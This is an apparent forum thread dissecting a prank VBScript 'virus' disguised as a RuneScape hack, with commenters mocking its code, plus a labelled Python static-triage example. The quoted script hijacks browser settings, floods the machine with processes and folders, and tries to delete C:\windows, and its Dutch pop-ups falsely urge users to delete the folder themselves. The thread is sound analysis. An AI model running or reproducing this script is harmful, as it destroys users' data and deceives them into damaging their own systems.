Writing a virus in Visual Basic




  • Apparently SpectateSwamp also writes viruses.

    My brother wanted a RuneScape hack and downloaded this. And ran it. He said he had a virus. I saw what he downloaded (a 2 MB VBS file that claimed to be a virus when it ran) so I looked in the source to see what it might have done.

    Behold.

    msgbox "Hey you computer has been hacked by h4ckblood!"
    Set shl = CreateObject("Wscript.shell")
    Shl.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://halflife2.zoy.org"
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    msgbox "je hebt het h4ckblood virus!"
    Set oWMP = CreateObject("WMPlayer.OCX.7" )
    Set colCDROMs = oWMP.cdromCollection
    colCDROMs.Item(i).Eject
    Set WshShell = WScript.CreateObject ("WScript.Shell")
    WshShell.Run ("C:\Windows")
    Set shl = CreateObject("Wscript.shell")
    Shl.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","hacked by h4ckblood! dit internet word aangeboden door bellel 5 euro per minuut!!"
    msgbox "your computer has been hacked by h4ckblood!!"
    msgbox "you have the h4ckblood virus!"
    msgbox "waarschuwing: windows heeft het h4ckblood virus op uw computer aangetroven! uw computer gaat mogelijk crachen als u de pc uitzet kan hij niet meer aan! wij raden u aan om de windows map te verwijderen",1024,"windows virus waarschuwing!"
    msgbox "binnen enkele sec start er automatisch een map u moet in die map een map zoeken met de naam: windows. die map moet u dan verwijderen. windows maakt automatisch daarna een backup waardoor het virus weg is en een nieuwe windows map word gemaakt. als dit gedaan is is het virus weg!",1024,"windows virus waarschuwing"
    Set WshShell = WScript.CreateObject ("WScript.Shell")
    WshShell.Run ("C:\")
    path = "C:\frt"
    set filesys=CreateObject("Scripting.FileSystemObject")
    If Not filesys.FolderExists(path) Then
    Set folder = filesys.CreateFolder(path)
    End If
    path = "C:\joyg"
    set filesys=CreateObject("Scripting.FileSystemObject")
    If Not filesys.FolderExists(path) Then
    Set folder = filesys.CreateFolder(path)
    End If
     --- -- about 4 000 more lines of creating folders this way -- ---
    path = "C:\windows/system32/crackers trojan" 
    set filesys=CreateObject("Scripting.FileSystemObject")
    If Not filesys.FolderExists(path) Then
    Set folder = filesys.CreateFolder(path)
    End If
    Set WshShell = WScript.CreateObject ("WScript.Shell")
    WshShell.Run ("C:\Windows\notepad.exe")
    Set WshShell = WScript.CreateObject ("WScript.Shell")
    WshShell.Run ("C:\Windows\notepad.exe")
    Set WshShell = WScript.CreateObject ("WScript.Shell")
    WshShell.Run ("C:\Windows\notepad.exe")
    Set WshShell = WScript.CreateObject ("WScript.Shell")
     --- -- about 40 000 more lines of this, running about 20 000 notepads -- ---
    Set WshShell = WScript.CreateObject ("WScript.Shell")
    WshShell.Run ("C:\Windows\notepad.exe")
    ' delete
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set aFolder = fso.GetFolder("C:\windows")
    aFolder.Delete
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    msgbox "sorry! je pc is stuk!"
    msgbox "tjaa had jij nooit een virus moeten openen!"
    msgbox "hacked by h4ckblood trojan"
    msgbox "made by h4ckblood"
    msgbox "made in netherlands"
    msgbox "you was owned by h4ckblood!"
    msgbox "maar tjaa zonde van je computertje!"
    msgbox "ik zou maar vast een nieuwe kopen!"
    msgbox "en de stekkers eruit halen"
    msgbox "want deze virus veroorzaakt koortsluiting!"
    msgbox "fuck hamas!"
    msgbox "WARNING: UW COMPUTER LOOPT GROOT RISICO! BINNEN ENKELE SECONDEN KOMT ER KORTSLUITING! VIRUS WARNING!!!!! VIRUS DANGER! VIRUS GEVAAR! VIRUSSSSSS! DANGER! DANGER! DANGER!"
    msgbox "VAARWEL LOVELY PC! SORRY! SORRY! SORRY!"
    msgbox "dont forget: YOU WAS HACKED BY H4CKBLOOD!!!"

    On my brother's computer it did nothing but pop up a few messages. It didn't even get to the line where it's supposed to show the contents of the C:\WINDOWS folder.
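
An added example, not part of the original post or thread: a static triage pass over VBScript source of the kind quoted above. It reads the file as text, never executes it, and tallies registry writes, launched commands and folder operations so that thousands of repeated lines collapse into a count. The sample input is constructed, and the names `triage`, `report` and the severity ranking are assumptions of this example.

```python
import re
from collections import Counter

# Constructed sample shaped like the quoted script; the URL is a placeholder.
SAMPLE = r'''
Set shl = CreateObject("Wscript.shell")
Shl.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://example.invalid"
Set WshShell = WScript.CreateObject ("WScript.Shell")
WshShell.Run ("C:\Windows\notepad.exe")
WshShell.Run ("C:\Windows\notepad.exe")
path = "C:\frt"
set filesys=CreateObject("Scripting.FileSystemObject")
Set folder = filesys.CreateFolder(path)
' delete
Set fso = CreateObject("Scripting.FileSystemObject")
Set aFolder = fso.GetFolder("C:\windows")
aFolder.Delete
'''

LITERAL = re.compile(r'"([^"]*)"')
ASSIGN = re.compile(r'^(?:set\s+)?(\w+)\s*=\s*(.+)$', re.I)
CALL = re.compile(r'^(\w+)\.(\w+)\s*(.*)$')
CREATE = re.compile(r'CreateObject\s*\(\s*"([^"]*)"', re.I)
FOLDER_OP = re.compile(r'\.(GetFolder|CreateFolder)\s*\(\s*([^)]*?)\s*\)', re.I)
SHELL_CALLS = {"regwrite": "registry-write", "run": "run"}
SEVERITY = {"delete-folder": 3, "registry-write": 2, "run": 1, "create-folder": 1}

def triage(source):
    """Return a Counter of (kind, target) findings; nothing is executed."""
    progids, strings, folders, hits = {}, {}, {}, Counter()
    def resolve(arg):  # literal, known string variable, or marked unresolved
        m = LITERAL.fullmatch(arg)
        return m.group(1) if m else strings.get(arg.lower(), f"<unresolved:{arg}>")
    for line in map(str.strip, source.splitlines()):
        if not line or line.startswith("'"):  # blank line or VBScript comment
            continue
        if m := ASSIGN.match(line):
            # VBScript names are case-insensitive, so track them lower-cased.
            name, rhs = m.group(1).lower(), m.group(2).strip()
            if c := CREATE.search(rhs):
                progids[name] = c.group(1).lower()
            elif f := FOLDER_OP.search(rhs):
                if f.group(1).lower() == "getfolder":
                    folders[name] = resolve(f.group(2))
                else:
                    hits["create-folder", resolve(f.group(2))] += 1
            elif LITERAL.fullmatch(rhs):
                strings[name] = rhs[1:-1]
        elif m := CALL.match(line):
            obj, method, args = m.group(1).lower(), m.group(2).lower(), LITERAL.findall(m.group(3))
            if progids.get(obj) == "wscript.shell" and method in SHELL_CALLS and args:
                hits[SHELL_CALLS[method], args[0]] += 1
            elif method == "delete" and obj in folders:
                hits["delete-folder", folders[obj]] += 1
    return hits

def report(hits):
    """Findings sorted most severe first, repeats collapsed into a count."""
    return sorted(((SEVERITY[k], k, t, n) for (k, t), n in hits.items()), reverse=True)
```

Because variables are resolved before the call is scored, `aFolder.Delete` is reported against `C:\windows` rather than as an anonymous method call.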



  • Give your brother an upgrade to a virus that actually works, as punishment for trying to cheat.



  • I second that motion.



  • VB Virii are old hat.  I had a work machine get one in 1995.  Clean up was not a big deal in that case, but the fact that it was able to mess with the registry was a little disturbing.

    The virus my machine caught was "Irish", which propagates via MS-Word document macros.   That something so brain-dead simple could put a machine at risk is one of the many reasons why I don't use MS products at home.



  • This is the VB version of urinating in phone boxes.



  • @Critter said:

    VB Virii are old hat.  I had a work machine get one in 1995.  Clean up was not a big deal in that case, but the fact that it was able to mess with the registry was a little disturbing.

    The virus my machine caught was "Irish", which propagates via MS-Word document macros.   That something so brain-dead simple could put a machine at risk is one of the many reasons why I don't use MS products at home.

    Or you could try not running as Administrator....

    I could do the same thing to you on a *nix box if you made the decision to run as root constantly.


  • Discourse touched me in a no-no place

    @Critter said:

    VB Virii are old hat.  I had a work machine get one in 1995. 

    What's a virii?



  • @PJH said:

    @Critter said:

    VB Virii are old hat.  I had a work machine get one in 1995. 

    What's a virii?

     

    Those crazy Useneters from alt.hackers.malicious are back again. 



  • I think my favorite part is how the script constantly reminds the user that it's a virus.

    "Boo! You just got hacked! Really. Because I'm a virus. A dangerous one. Yup, I'm a real virus. And I do danger. Look! I might have harmed your computer now. Because I'm a real virus!" 


    As disturbing as it may sound, VB can be quite powerful. Don't forget VB 6's ability to create COM objects with just a few lines of code. With a bit of COM experience, you can write your own ShellEx plugin for Explorer or BrowserHelperObject for IE quite easily.

    Still far away from serious trojans, but at the time VB 6 was current, it could still have been enough for some unnerving spy/adware.

    Believe it or not, in Germany, we had not one but TWO media-dominating virus crazes a few years ago, both caused by VB derivatives. The first one was a macro worm inside an MS Word document containing links to various porn sites (don't ask...), the second was the infamous ILOVEYOU script...

     

    As for the original post, anyone else wondering what's up with all the CreateObject's randomly sprinkled throughout the code? Maybe the guy thought programming is like Counter Strike and you have to "reload" after a number of commands?



  • @PSWorx said:

    I think my favorite part is how the script constantly reminds the user that it's a virus.

    "Boo! You just got hacked! Really. Because I'm a virus. A dangerous one. Yup, I'm a real virus. And I do danger. Look! I might have harmed your computer now. Because I'm a real virus!" 


    As disturbing as it may sound, VB can be quite powerful. Don't forget VB 6's ability to create COM objects with just a few lines of code. With a bit of COM experience, you can write your own ShellEx plugin for Explorer or BrowserHelperObject for IE quite easily.

    Still far away from serious trojans, but at the time VB 6 was current, it could still have been enough for some unnerving spy/adware.

    Believe it or not, in Germany, we had not one but TWO media-dominating virus crazes a few years ago, both caused by VB derivatives. The first one was a macro worm inside an MS Word document containing links to various porn sites (don't ask...), the second was the infamous ILOVEYOU script...

     

    As for the OP, anyone else wondering what's up with all the CreateObject's randomly sprinkled throughout the code? Maybe the guy thought programming is like Counter Strike and you have to "reload" after a number of commands?

    This is not VB6. This is VBScript. 

    CreateObject is how VB loads external COM objects. (no I don't know why he uses it so much for the same variable. I think he is stupid and likes copy/paste)

    So anyway, VB != VBScript and your post is mostly invalid. Sorry.

    But I do find it funny the first statement tells the user it is a virus... "Whooops!" End Task --> w(c)script.exe  "Whew!"



  • It looks like he's worried that his object might be stale...  so he always creates a new one before he uses it.

    Kind of defeats the purpose of a virus scanner, if the virus itself is constantly warning you that you're infected.



  • @GalacticCowboy said:

    It looks like he's worried that his object might be stale...  so he always creates a new one before he uses it.

    Kind of defeats the purpose of a virus scanner, if the virus itself is constantly warning you that you're infected.

    I think it is just an obvious case of a 14 year old kid learning VBScript for the first time and realizing you can actually do bad things... H4X0R!!!

    Judging by his code, he isn't much of a risk to the world.



  • @MasterPlanSoftware said:

    @GalacticCowboy said:

    It looks like he's worried that his object might be stale...  so he always creates a new one before he uses it.

    Kind of defeats the purpose of a virus scanner, if the virus itself is constantly warning you that you're infected.

    I think it is just an obvious case of a 14 year old kid learning VBScript for the first time and realizing you can actually do bad things... H4X0R!!!

    Judging by his code, he isn't much of a risk to the world.

    yeah...  *pssht* "worried"? "object"?  I gave the guy too much credit.  :D

    Of course, I've seen some people who go to the other extreme.  Sometime back I saw an article on ZDNet that claimed that any document that contained macros was an attempt to hack or infect you, since "nobody" uses macros for legitimate purposes...



  • @GalacticCowboy said:

    @MasterPlanSoftware said:
    @GalacticCowboy said:

    It looks like he's worried that his object might be stale...  so he always creates a new one before he uses it.

    Kind of defeats the purpose of a virus scanner, if the virus itself is constantly warning you that you're infected.

    I think it is just an obvious case of a 14 year old kid learning VBScript for the first time and realizing you can actually do bad things... H4X0R!!!

    Judging by his code, he isn't much of a risk to the world.

    yeah...  *pssht* "worried"? "object"?  I gave the guy too much credit.  :D

    Of course, I've seen some people who go to the other extreme.  Sometime back I saw an article on ZDNet that claimed that any document that contained macros was an attempt to hack or infect you, since "nobody" uses macros for legitimate purposes...

    And again, I have to point out that is neither VB nor VBScript, but VBA.

    Always funny how all of those get all mashed up.

    Nowadays we have VB, VBA, VBScript and VB.NET. Amazing.



  • Look, how about pondering the possibility that - lo and behold! - we DO know about the differences between those four and just want to broaden the discussion? That's commonly called "off topic".



  • @MasterPlanSoftware said:

    Nowadays we have VB, VBA, VBScript and VB.NET. Amazing.

    I think amazing would be the last word I would use to describe that particular phenomenon.

    While we're on the subject, does it bother anyone else when people say JavaScript when they mean Java and/or the other way around?



  • By the way, the "virus" opens the C: folder and says to the user (in Dutch) that they have to delete a folder called Windows :P



  • @PSWorx said:

    Look, how about pondering the possibility that - lo and behold! - we DO know about the differences between those four and just want to broaden the discussion? That's commonly called "off topic".

    Right, and by expressing all the flavors of VB and company, that isn't loading the wtf cannon up right?

     



  • @XIU said:

    By the way, the "virus" opens the C: folder and says to the user (in Dutch) that they have to delete a folder called Windows :P

    He also ATTEMPTS to delete the windows folder:

    Set fso = CreateObject("Scripting.FileSystemObject")
    Set aFolder = fso.GetFolder("C:\windows")
    aFolder.Delete

    I cannot imagine that works out too well for him...

     



  • @Critter said:

    The virus my machine caught was "Irish", which propagates via MS-Word document macros.  

    I thought the Irish virus was the email saying:

    "You have caught the Irish virus!!  Please forward this email to everyone you know then delete all the files on your computer."

     



  • @LoztInSpace said:

    @Critter said:

    The virus my machine caught was "Irish", which propagates via MS-Word document macros.  

    I thought the Irish virus was the email saying:

    "You have caught the Irish virus!!  Please forward this email to everyone you know then delete all the files on your computer."


     

     



  • @MasterPlanSoftware said:

    @LoztInSpace said:

    @Critter said:

    The virus my machine caught was "Irish", which propagates via MS-Word document macros.  

    I thought the Irish virus was the email saying:

    "You have caught the Irish virus!!  Please forward this email to everyone you know then delete all the files on your computer."


    <snipped image>
    Also note the image version (posted by MPS) even contains a bug. Which I presume was deliberate by the author.


  • That's the cutest virus I ever saw. I just love the way he mimics system messages, with typos, suggesting to remove the windows folder :D

     

    "This virus causes shortcircuits" :D



  • @PSWorx said:

    Maybe the guy thought programming is like Counter Strike and you have to "reload" after a number of commands?

    Would that be Counter Strike: Source?
     



  • I still haven't found the routine that causes the short circuit in your computer. That's some amazing obfuscation.



  • @h4ckblood said:

    msgbox "waarschuwing: windows heeft het h4ckblood virus op uw computer aangetroven! uw computer gaat mogelijk crachen als u de pc uitzet kan hij niet meer aan! wij raden u aan om de windows map te verwijderen",1024,"windows virus waarschuwing!"
    msgbox "binnen enkele sec start er automatisch een map u moet in die map een map zoeken met de naam: windows. die map moet u dan verwijderen.
    windows maakt automatisch daarna een backup waardoor het virus weg is en een nieuwe windows map word gemaakt. als dit gedaan is is het virus weg!"

    Translation (spelling failures preserved as much as possible):

    warning: windows has detecktet the h4ckblood virus on your computer! your computer will possibly crach if you turn off the pc it will not turn on anymore! we advise you to delete the windows folder

    in a few sec a folder will start automatically you must find in this folder a folder with the name: windows. you must delete that folder. windows will automatically make a backup that makes the virus go away and a new windows folder will me made. when this is done the virus will be gone!



  • @dhromed said:

    Translation (spelling failures preserved as much as possible):

    warning: windows has detecktet the h4ckblood virus on your computer! your computer will possibly crach if you turn off the pc it will not turn on anymore! we advise you to delete the windows folder

    in a few sec a folder will start automatically you must find in this folder a folder with the name: windows. you must delete that folder. windows will automatically make a backup that makes the virus go away and a new windows folder will me made. when this is done the virus will be gone!

    Now that's a lazy virus writer! 



  • Set oWS = WScript.CreateObject("WScript.Shell")
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True
    oWS.Run "%comspec% /c echo " & Chr(07), 0, True

    Took a while to guess what this was supposed to do. Then it dawned on me: The virus author shall be Hounded by the Spectres of Hackers Past when they create a new shell that runs a command interpreter that runs a command that reasonably emulates beeping.

    Set oWMP = CreateObject("WMPlayer.OCX.7" )
    Set colCDROMs = oWMP.cdromCollection
    colCDROMs.Item(i).Eject

    The REAL WTF®: Uninitialised variable i.



  • msgbox "fuck hamas!"


    I think I just found the obligatory political message.


  • @marinus said:

    msgbox "fuck hamas!"




    I think I just found the obligatory political message.

    Well I saw that, but I thought a Political Message was so obligatory that it wasn't even worth commenting on. I mean, it's not a proper virus unless it has a Political Message, right?

